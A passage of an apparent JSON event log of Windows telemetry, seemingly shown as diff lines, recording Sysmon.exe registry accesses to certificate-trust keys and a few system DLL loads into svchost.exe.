"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rmclient.dll", - "image_path": "C:\\Windows\\System32\\rmclient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "coml2.dll", - "image_path": "C:\\Windows\\System32\\coml2.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": 